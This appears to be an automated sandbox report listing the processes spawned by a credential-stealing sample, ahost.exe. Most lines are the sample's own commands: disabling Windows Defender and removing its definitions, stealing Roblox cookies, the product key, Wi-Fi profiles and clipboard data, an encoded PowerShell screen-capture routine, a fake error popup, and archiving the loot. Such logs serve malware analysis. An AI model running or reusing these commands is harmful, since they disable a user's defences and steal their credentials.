Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
